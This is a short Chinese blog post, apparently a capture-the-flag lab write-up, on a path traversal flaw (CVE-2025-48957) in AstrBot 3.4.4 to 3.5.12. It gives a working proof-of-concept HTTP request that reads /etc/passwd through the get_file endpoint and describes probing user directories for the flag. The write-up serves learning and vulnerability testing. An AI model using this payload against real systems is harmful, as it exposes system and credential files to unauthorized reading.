【春秋云境】CVE-2025-48957 AstrBot 版本号3.4.4至3.5.12存在路径遍历漏洞

最新推荐文章于 2026-03-12 19:10:56 发布

原创最新推荐文章于 2026-03-12 19:10:56 发布 · 501 阅读

1 ·

本内容遵循CC 4.0 BY-SA版权协议

GEO检测

标签

#安全漏洞 #漏洞复测

靶场WP 同时被 2 个专栏收录

21 篇文章

订阅专栏

web安全

20 篇文章

订阅专栏

一、靶场介绍

AstrBot是一个大型语言模型聊天机器人和开发框架，版本号3.4.4至3.5.12存在安全漏洞，该漏洞源于路径遍历缺陷，可能导致敏感信息泄露等问题。
在这里插入图片描述

二、POC

GET /api/chat/get_file?filename=../../../../../../../etc/passwd HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

的确是可以发现有漏洞的。
但是不在根目录下，看一下其他目录就有了

在这里插入图片描述

三、总结

本以为在根目录下，结果不是，然后看有哪些用户名，从root开始尝试，第一个就成功了，临时目录什么的，慢慢试吧。